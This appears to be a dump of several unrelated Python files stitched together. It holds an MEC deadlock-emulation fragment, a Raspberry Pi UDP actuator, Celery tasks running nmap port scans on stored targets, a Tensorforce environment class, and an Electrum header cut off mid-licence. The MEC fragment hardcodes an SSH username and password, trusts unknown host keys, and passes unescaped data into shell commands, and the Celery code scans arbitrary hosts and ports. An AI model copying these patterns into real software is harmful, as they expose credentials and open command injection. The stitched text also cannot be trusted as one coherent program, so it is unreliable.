shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound-wait {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
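# Illustrative sketch (not part of the original script): mec_id zero-pads the last IPv4 octet to three digits.
#   >>> mec_id('192.168.1.5')
#   '005'
#   >>> mec_id('192.168.1.45')
#   '045'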
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received{_id_}_7_{mec_no} = {total_received_task} \nsent_t{_id_}_7_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_7_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def terminate_process():
global prev_t, _loc, _off_mec, _off_cloud, _inward_mec, outward_mec, deadlock, memory, mec_waiting_time, mec_rtt
global offload_register, reoffload_list, discovering, test, _time, _pos, received_task_queue, received_time
global cloud_register, t_track, task_record, task_id, cooperate, clients_record, offload_check
global timed_out_tasks, total_received_task, _cpu
# reinitialize #
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlocks are resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records tasks that are re-offloaded to the MEC to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
cooperate = {'mec': 0, 'cloud': 0}
clients_record = {}
offload_check = [0, 0]
timed_out_tasks = 0
total_received_task = 0
time.sleep(1)
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = True # signal the worker threads to stop before joining them
for th in threads_:
th.join()
time.sleep(1)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('Terminating process')
terminate_process()
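# Illustrative invocation from an agent (a sketch only; the host names, IPs,
# MEC count and result path below are placeholders, not values from this deployment):
#   run_me(hosts_={'osboxes-0': '192.168.122.10', 'osboxes-1': '192.168.122.11'},
#          mec_no_=2, cloud_ip_='192.168.122.50',
#          send_path='/home/mec/results/', broker_ip_='192.168.122.60')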
|
actuator_v2.py
|
# USE ON RASPBERRY PI
import socket
import RPi.GPIO as GPIO
import threading
import time
# Pin voltage
HIGH = GPIO.HIGH
LOW = GPIO.LOW
# Networking
SRC_IP = '10.35.0.1' # The actuator.
DST_IP = '10.34.0.1' # The sensor.
PORT = 5005 # Port number used for sending and listening.
# Message
SNT_MSG = 'hello' # The hello message
MSG_ENC = 'UTF-8' # Message encoding.
D_TIME = 4 # Maximum dead time in seconds.
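# Heartbeat overview: sendUDP() (thread 2) transmits SNT_MSG every 0.5 s, and
# lightState() (thread 1) resets its dead timer on every valid packet ('True',
# 'False' or 'hello'). If nothing arrives for D_TIME seconds (4 s, i.e. roughly
# eight missed heartbeats), the actuator starts flashing the LED on pin 11.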
# Flashes lights. Used in conjunction with dead timer.
# If the timer exceeds threshold, flash lights.
def lightFlash():
GPIO.output(11, HIGH)
time.sleep(0.2)
GPIO.output(11, LOW)
time.sleep(0.2)
# Listens on UDP packets and returns the decoded data, as long as it's from the right IP and port.
# If it fails, or the received IP doesn't match the sensor's IP, it returns '255'.
def listenonUDP(clientsocket):
lock = threading.Lock()
try:
lock.acquire()
data, (address, port) = clientsocket.recvfrom(1024)
lock.release()
if str(address) == DST_IP and int(port) == PORT: # checks for correct IP and PORT.
return data.decode(MSG_ENC) # return decoded data for use in the function lightState.
else:
return '255'
except KeyboardInterrupt: # Catches CTRL-C.
pass
except:
return '255'
# Thread1, lights LEDs. It uses the 'listenonUDP'-function to determine whether or not to turn on
# the LEDs. If the string in the variable data matches 'True', it will turn on the LED according to the
# specifications. If it receives 'False', it will turn off the LEDs.
# If it receives a 'hello', it will update the dead timer. Every other string or data is disregarded.
def lightState(clientsocket):
lock = threading.Lock()
flag = 0 # Used for if statements, so they don't reset the timer if multiple packets containing the
# same data are received. 1 means 'True' has already been received, 0 for 'False'.
deadtimer = time.time() # Used for printing messages on screen if timer gets too great.
lighttimer = 0.0 # Used for determining when to light the second LED.
while True:
data = listenonUDP(clientsocket) # Calls the function and returns strings. 255 == no data from socket.
if data == '255' and time.time() - deadtimer >= D_TIME:
lightFlash() # Flashes light if dead timer is over threshold.
elif data == 'True' and flag == 0:
flag = 1
lighttimer = time.time()
deadtimer = time.time()
GPIO.output(7, HIGH)
elif data == 'True' and flag == 1:
deadtimer = time.time()
elif data == 'False' and flag == 1:
flag = 0
lighttimer = time.time()
deadtimer = time.time()
GPIO.output(7, LOW)
GPIO.output(11, LOW)
elif data == 'False' and flag == 0:
deadtimer = time.time()
elif data == 'hello':
deadtimer = time.time()
if time.time() - lighttimer > 5 and flag == 1:
GPIO.output(11, HIGH)
# Thread2, sends hello packets.
def sendUDP(clientsocket):
lock = threading.Lock() # Used for locking the sockets later. Prevents cancelling by the operating system.
timer = time.time() # used for sending packets containing the string 'hello' within intervals.
clientsocket.sendto(bytes('getState', MSG_ENC), (DST_IP, PORT)) # Gets the current state of the LEDs from the
# sensor. Used in case the temp is >26 during
# startup.
while True:
if time.time() - timer >= 0.5:
lock.acquire() # lock socket.
clientsocket.sendto(bytes(SNT_MSG, MSG_ENC), (DST_IP, PORT))
lock.release() # unlock socket.
timer = time.time() # Resets timer.
def main():
print('Running program')
GPIO.setmode(GPIO.BOARD) # Sets pin mode to BOARD (Pin numbers)
GPIO.setwarnings(False) # Suppresses startup warnings.
GPIO.setup(7, GPIO.OUT) # Sets pins as output.
GPIO.setup(11, GPIO.OUT)
GPIO.output(7, LOW) # Turns off lights at startup
GPIO.output(11, LOW)
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
clientsocket.bind((SRC_IP, PORT)) # Binds the IP and port to the pi. Prevents the socket from closing.
clientsocket.setblocking(False) # Prevents wait time when reading from socket.
# That way, the socket always times out when there's no data to be read.
# Makes the functions lightState and sendUDP into threads and sends clientsocket as argument.
t1 = threading.Thread(target = lightState, args = (clientsocket,))
t2 = threading.Thread(target = sendUDP, args = (clientsocket,))
# Starts the threads.
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
while True:
print('If you want to exit the program, type quit')
try:
data = input()
if data == 'quit':
GPIO.cleanup()
clientsocket.close()
exit()
except KeyboardInterrupt:
GPIO.cleanup()
clientsocket.close()
exit()
except EOFError:
GPIO.cleanup()
clientsocket.close()
exit()
main()
|
celery_tasks.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云(BlueKing) available.
Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
celery task examples
Start a celery worker locally: python manage.py celery worker --settings=settings
Periodic tasks additionally require the celery beat scheduler: python manage.py celerybeat --settings=settings
"""
import datetime
from celery import task
from celery.schedules import crontab
from celery.task import periodic_task
from common.log import logger
import os
import time
import re
import socket
from home_application.models import PortScanPara,PortScan
from threading import Thread
import nmap
def hostIpList():
return socket.gethostbyname_ex(socket.gethostname())[2]
def check_ip(ipAddr):
compile_ip=re.compile('^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
if compile_ip.match(ipAddr):
return True
else:
return False
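# e.g. check_ip('192.168.1.1') -> True, check_ip('256.1.1.1') -> False,
# check_ip('not-an-ip') -> False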
def hostname():
sys = os.name
if sys == 'nt':
hostname = os.getenv('computername')
return hostname
elif sys == 'posix':
host = os.popen('echo $HOSTNAME')
try:
hostname = host.read()
return hostname
finally:
host.close()
else:
return 'Unknown hostname'
def nmapScan(hostname,tip, port):
portscan_recode = PortScan(source_hostname=hostname, target_ip=tip, target_port=port,state="正在扫描...",protocol="TCP")
portscan_recode.save()
nmScan = nmap.PortScanner()
nmScan.scan(tip, port, arguments='-T4 -Pn')
state = nmScan[tip]['tcp'][int(port)]['state']
PortScan.objects.filter(source_hostname=hostname, target_ip=tip, target_port=port).update(state=state, scan_time=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(time.time())))
@task()
def async_portscan():
logger.error(u"celery 定时任务执行成功,async_portscan")
last_scantask = PortScanPara.objects.filter().last()
host = hostname()
source_hostname = last_scantask.source_hostname
target_ip = last_scantask.target_ip
target_port = last_scantask.target_port
target_ips = str(target_ip).split(',')
target_ports = str(target_port).split(',')
for target_ip in target_ips:
for target_port in target_ports:
t = Thread(target = nmapScan,args = (str(source_hostname), str(target_ip), str(target_port)))
t.start()
@task()
def async_task(x, y):
"""
Define a celery asynchronous task
"""
logger.error(u"celery 定时任务执行成功,执行结果:{:0>2}:{:0>2}".format(x, y))
return x + y
def execute_task():
"""
Execute the celery asynchronous task
Ways to invoke a celery task:
task.delay(arg1, arg2, kwarg1='x', kwarg2='y')
task.apply_async(args=[arg1, arg2], kwargs={'kwarg1': 'x', 'kwarg2': 'y'})
delay(): shorthand method, similar to calling an ordinary function
apply_async(): must be used when setting extra celery execution options, such as a scheduled time (eta)
See: http://celery.readthedocs.org/en/latest/userguide/calling.html
"""
now = datetime.datetime.now()
logger.error(u"celery 定时任务启动,将在60s后执行,当前时间:{}".format(now))
# invoke the scheduled task
async_task.apply_async(args=[now.hour, now.minute], eta=now + datetime.timedelta(seconds=60))
@periodic_task(run_every=crontab(minute='*/5', hour='*', day_of_week="*"))
def get_time():
"""
celery periodic task example
run_every=crontab(minute='*/5', hour='*', day_of_week="*"): run the task every 5 minutes
periodic_task: periodic tasks are triggered automatically while the program is running
"""
execute_task()
now = datetime.datetime.now()
logger.error(u"celery 周期任务调用成功,当前时间:{}".format(now))
|
environment.py
|
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from datetime import datetime
import importlib
import json
import os
import sys
from threading import Thread
from traceback import format_tb
from tensorforce import TensorforceError, util
import tensorforce.environments
class Environment(object):
"""
Tensorforce environment interface.
"""
@staticmethod
def create(
environment=None, max_episode_timesteps=None, remote=None, blocking=False, host=None,
port=None, **kwargs
):
"""
Creates an environment from a specification. In case of "socket-server" remote mode, runs
environment in server communication loop until closed.
Args:
environment (specification | Environment class/object): JSON file, specification key,
configuration dictionary, library module, `Environment` class/object, or gym.Env
(<span style="color:#C00000"><b>required</b>, invalid for "socket-client" remote
mode</span>).
max_episode_timesteps (int > 0): Maximum number of timesteps per episode, overwrites
the environment default if defined
(<span style="color:#00C000"><b>default</b></span>: environment default, invalid
for "socket-client" remote mode).
remote ("multiprocessing" | "socket-client" | "socket-server"): Communication mode for
remote environment execution or parallelized environment execution, "socket-client"
mode requires a corresponding "socket-server" running, and "socket-server" mode
runs environment in server communication loop until closed
(<span style="color:#00C000"><b>default</b></span>: local execution).
blocking (bool): Whether remote environment calls should be blocking
(<span style="color:#00C000"><b>default</b></span>: not blocking, invalid unless
"multiprocessing" or "socket-client" remote mode).
host (str): Socket server hostname or IP address
(<span style="color:#C00000"><b>required</b></span> only for "socket-client" remote
mode).
port (int): Socket server port
(<span style="color:#C00000"><b>required</b></span> only for "socket-client/server"
remote mode).
kwargs: Additional arguments.
"""
if remote not in ('multiprocessing', 'socket-client'):
if blocking:
raise TensorforceError.invalid(
name='Environment.create', argument='blocking',
condition='no multiprocessing/socket-client instance'
)
if remote not in ('socket-client', 'socket-server'):
if host is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='host', condition='no socket instance'
)
elif port is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='port', condition='no socket instance'
)
if remote == 'multiprocessing':
from tensorforce.environments import MultiprocessingEnvironment
environment = MultiprocessingEnvironment(
blocking=blocking, environment=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
return environment
elif remote == 'socket-client':
if environment is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='environment',
condition='socket-client instance'
)
elif max_episode_timesteps is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='max_episode_timesteps',
condition='socket-client instance'
)
elif len(kwargs) > 0:
raise TensorforceError.invalid(
name='Environment.create', argument='kwargs',
condition='socket-client instance'
)
from tensorforce.environments import SocketEnvironment
environment = SocketEnvironment(host=host, port=port, blocking=blocking)
return environment
elif remote == 'socket-server':
from tensorforce.environments import SocketEnvironment
SocketEnvironment.remote(
port=port, environment=environment, max_episode_timesteps=max_episode_timesteps,
**kwargs
)
elif isinstance(environment, (EnvironmentWrapper, RemoteEnvironment)):
if max_episode_timesteps is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='max_episode_timesteps',
condition='EnvironmentWrapper instance'
)
if len(kwargs) > 0:
raise TensorforceError.invalid(
name='Environment.create', argument='kwargs',
condition='EnvironmentWrapper instance'
)
return environment
elif isinstance(environment, type) and \
issubclass(environment, (EnvironmentWrapper, RemoteEnvironment)):
raise TensorforceError.type(
name='Environment.create', argument='environment', dtype=type(environment)
)
elif isinstance(environment, Environment):
if max_episode_timesteps is not None:
environment = EnvironmentWrapper(
environment=environment, max_episode_timesteps=max_episode_timesteps
)
return environment
elif isinstance(environment, type) and issubclass(environment, Environment):
environment = environment(**kwargs)
assert isinstance(environment, Environment)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps
)
elif isinstance(environment, dict):
# Dictionary specification
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
if max_episode_timesteps is None:
max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif isinstance(environment, str):
if os.path.isfile(environment):
# JSON file specification
with open(environment, 'r') as fp:
environment = json.load(fp=fp)
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
if max_episode_timesteps is None:
max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif '.' in environment:
# Library specification
library_name, module_name = environment.rsplit('.', 1)
library = importlib.import_module(name=library_name)
environment = getattr(library, module_name)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
# Keyword specification
environment = tensorforce.environments.environments[environment]
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
from gym import Env
if isinstance(environment, Env) or \
(isinstance(environment, type) and issubclass(environment, Env)):
return Environment.create(
environment='gym', level=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
raise TensorforceError.type(
name='Environment.create', argument='environment', dtype=type(environment)
)
def __init__(self):
# first two arguments, if applicable: level, visualize=False
self._max_episode_timesteps = None
self._expect_receive = None
self._actions = None
def __str__(self):
return self.__class__.__name__
def states(self):
"""
Returns the state space specification.
Returns:
specification: Arbitrarily nested dictionary of state descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – state data type
(<span style="color:#00C000"><b>default</b></span>: "float").</li>
<li><b>shape</b> (<i>int | iter[int]</i>) – state shape
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>num_states</b> (<i>int > 0</i>) – number of discrete state values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum state value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def actions(self):
"""
Returns the action space specification.
Returns:
specification: Arbitrarily nested dictionary of action descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – action data type
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>shape</b> (<i>int > 0 | iter[int > 0]</i>) – action shape
(<span style="color:#00C000"><b>default</b></span>: scalar).</li>
<li><b>num_actions</b> (<i>int > 0</i>) – number of discrete action values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum action value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def max_episode_timesteps(self):
"""
Returns the maximum number of timesteps per episode.
Returns:
int: Maximum number of timesteps per episode.
"""
return self._max_episode_timesteps
def close(self):
"""
Closes the environment.
"""
pass
def reset(self):
"""
Resets the environment to start a new episode.
Returns:
dict[state]: Dictionary containing initial state(s) and auxiliary information.
"""
raise NotImplementedError
def execute(self, actions):
"""
Executes the given action(s) and advances the environment by one step.
Args:
actions (dict[action]): Dictionary containing action(s) to be executed
(<span style="color:#C00000"><b>required</b></span>).
Returns:
((dict[state], bool | 0 | 1 | 2, float)): Dictionary containing next state(s), whether
a terminal state is reached or 2 if the episode was aborted, and observed reward.
"""
raise NotImplementedError
def start_reset(self):
if self._expect_receive is not None:
raise TensorforceError.unexpected()
self._expect_receive = 'reset'
def start_execute(self, actions):
if self._expect_receive is not None:
raise TensorforceError.unexpected()
self._expect_receive = 'execute'
assert self._actions is None
self._actions = actions
def receive_execute(self):
if self._expect_receive == 'reset':
self._expect_receive = None
return self.reset(), -1, None
elif self._expect_receive == 'execute':
self._expect_receive = None
assert self._actions is not None
states, terminal, reward = self.execute(actions=self._actions)
self._actions = None
return states, int(terminal), reward
else:
raise TensorforceError.unexpected()
class EnvironmentWrapper(Environment):
def __init__(self, environment, max_episode_timesteps):
super().__init__()
if isinstance(environment, EnvironmentWrapper):
raise TensorforceError.unexpected()
if environment.max_episode_timesteps() is not None and \
environment.max_episode_timesteps() < max_episode_timesteps:
raise TensorforceError.unexpected()
self.environment = environment
self.environment._max_episode_timesteps = max_episode_timesteps
self._max_episode_timesteps = max_episode_timesteps
def __str__(self):
return str(self.environment)
def states(self):
return self.environment.states()
def actions(self):
return self.environment.actions()
def close(self):
return self.environment.close()
def reset(self):
self.timestep = 0
return self.environment.reset()
def execute(self, actions):
assert self.timestep < self._max_episode_timesteps
states, terminal, reward = self.environment.execute(actions=actions)
terminal = int(terminal)
self.timestep += 1
if terminal == 0 and self.timestep >= self._max_episode_timesteps:
terminal = 2
return states, terminal, reward
class RemoteEnvironment(Environment):
@classmethod
def proxy_send(cls, connection, function, **kwargs):
raise NotImplementedError
@classmethod
def proxy_receive(cls, connection):
raise NotImplementedError
@classmethod
def proxy_close(cls, connection):
raise NotImplementedError
@classmethod
def remote_send(cls, connection, success, result):
raise NotImplementedError
@classmethod
def remote_receive(cls, connection):
raise NotImplementedError
@classmethod
def remote_close(cls, connection):
raise NotImplementedError
@classmethod
def remote(cls, connection, environment, max_episode_timesteps=None, **kwargs):
try:
environment = Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
while True:
function, kwargs = cls.remote_receive(connection=connection)
result = getattr(environment, function)(**kwargs)
cls.remote_send(connection=connection, success=True, result=result)
if function == 'close':
break
except BaseException:
try:
environment.close()
finally:
etype, value, traceback = sys.exc_info()
cls.remote_send(
connection=connection, success=False,
result=(str(etype), str(value), format_tb(traceback))
)
finally:
cls.remote_close(connection=connection)
def __init__(self, connection, blocking=False):
super().__init__()
self.connection = connection
self.blocking = blocking
self.observation = None
self.thread = None
def send(self, function, **kwargs):
if self._expect_receive is not None:
assert function != 'close'
self.close()
raise TensorforceError.unexpected()
self._expect_receive = function
try:
self.__class__.proxy_send(connection=self.connection, function=function, **kwargs)
except BaseException:
self.__class__.proxy_close(connection=self.connection)
raise
def receive(self, function):
if self._expect_receive != function:
assert function != 'close'
self.close()
raise TensorforceError.unexpected()
self._expect_receive = None
try:
success, result = self.__class__.proxy_receive(connection=self.connection)
except BaseException:
self.__class__.proxy_close(connection=self.connection)
raise
if success:
return result
else:
self.__class__.proxy_close(connection=self.connection)
etype, value, traceback = result
raise TensorforceError(message='{}: {}'.format(etype, value)).with_traceback(traceback)
def __str__(self):
self.send(function='__str__')
return self.receive(function='__str__')
def states(self):
self.send(function='states')
return self.receive(function='states')
def actions(self):
self.send(function='actions')
return self.receive(function='actions')
def max_episode_timesteps(self):
self.send(function='max_episode_timesteps')
return self.receive(function='max_episode_timesteps')
def close(self):
if self.thread is not None:
self.thread.join()
if self._expect_receive is not None:
self.receive(function=self._expect_receive)
self.send(function='close')
self.receive(function='close')
self.__class__.proxy_close(connection=self.connection)
self.connection = None
self.observation = None
self.thread = None
def reset(self):
self.send(function='reset')
return self.receive(function='reset')
def execute(self, actions):
self.send(function='execute', actions=actions)
return self.receive(function='execute')
def start_reset(self):
if self.blocking:
self.send(function='reset')
else:
if self.thread is not None: # TODO: not expected
self.thread.join()
self.observation = None
self.thread = Thread(target=self.finish_reset)
self.thread.start()
def finish_reset(self):
assert self.thread is not None and self.observation is None
self.observation = (self.reset(), -1, None)
self.thread = None
def start_execute(self, actions):
if self.blocking:
self.send(function='execute', actions=actions)
else:
assert self.thread is None and self.observation is None
self.thread = Thread(target=self.finish_execute, kwargs=dict(actions=actions))
self.thread.start()
def finish_execute(self, actions):
assert self.thread is not None and self.observation is None
self.observation = self.execute(actions=actions)
self.thread = None
def receive_execute(self):
if self.blocking:
if self._expect_receive == 'reset':
return self.receive(function='reset'), -1, None
else:
states, terminal, reward = self.receive(function='execute')
return states, int(terminal), reward
else:
if self.thread is not None:
# assert self.observation is None
return None
else:
assert self.observation is not None
observation = self.observation
self.observation = None
return observation
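if __name__ == '__main__':
    # Minimal usage sketch of the Environment API above (not part of the original
    # module). It assumes the optional gym dependency and the CartPole-v1 level
    # are available; any other registered keyword specification works the same way.
    env = Environment.create(environment='gym', level='CartPole-v1', max_episode_timesteps=200)
    print('states spec:', env.states())
    print('actions spec:', env.actions())
    print('max episode timesteps:', env.max_episode_timesteps())
    initial_states = env.reset()
    print('initial states:', initial_states)
    env.close()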
|
daemon.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
